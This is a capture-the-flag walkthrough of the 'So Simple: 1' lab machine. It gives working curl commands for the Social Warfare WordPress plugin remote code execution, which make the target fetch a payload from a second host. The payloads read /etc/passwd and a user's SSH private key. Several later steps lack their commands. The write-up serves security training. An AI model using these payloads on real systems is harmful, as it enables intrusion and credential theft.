So Simple: 1 Walkthrough

reference So Simple: 1
target ip 192.168.1.10

Scan with nmap:

SSH only support publickey auth method.
No need to hydra SSH service.

Enumerate HTTP service with gobuster:

Enumerate WordPress with wpscan:

1
wpscan --url http://192.168.1.10/wordpress  --no-banner

Original exploit is hash3liZer/CVE-2019-9978 and Social Warfare <= 3.5.2 - Unauthenticated Remote Code Execution (RCE).

Here I use curl to make it clearer.

payload.txt
1
<pre>system('cat /etc/passwd')</pre>

Exploit:

1
curl -s http://192.168.1.10/wordpress/wp-admin/admin-post.php\?swp_debug\=load_options\&swp_url\=http://192.168.1.89:8000/payload.txt

There are two users (max and steven).

Try to enumerate ssh private key, since SSH service only allows publickey auth method.

www-data has the privilege to view the content of /home/max/.ssh/id_rsa, which can be used to login via SSH.

payload.txt
1
<pre>system('cat /home/max/.ssh/id_rsa')</pre>

Exploit again:

1
curl -s http://192.168.1.10/wordpress/wp-admin/admin-post.php\?swp_debug\=load_options\&swp_url\=http://192.168.1.89:8000/payload.txt

Copy and save to local file, chmod 400 ./max.id_rsa.

/home/max/user.txt:

Privilege escalation from user max to user steven:

/home/steven/user2.txt:

Privilege escalation from user steven to user root:

There’s no /opt/tools, mkdir first.
Then place any commands you want to run as root:

/root/root.txt:


  • http://192.168.1.10/wordpress/wp-content/uploads/simple-file-list/

Related exploit is WordPress Plugin Simple File List 5.4 - Remote Code Execution.
But there’s no http://192.168.1.10/wordpress//wp-content/plugins/simple-file-list/ee-upload-engine.php and http://192.168.1.10/wordpress//wp-content/plugins/simple-file-list/ee-file-engine.php.

  • /home/max/personal.txt
  • /home/max/this

nonsense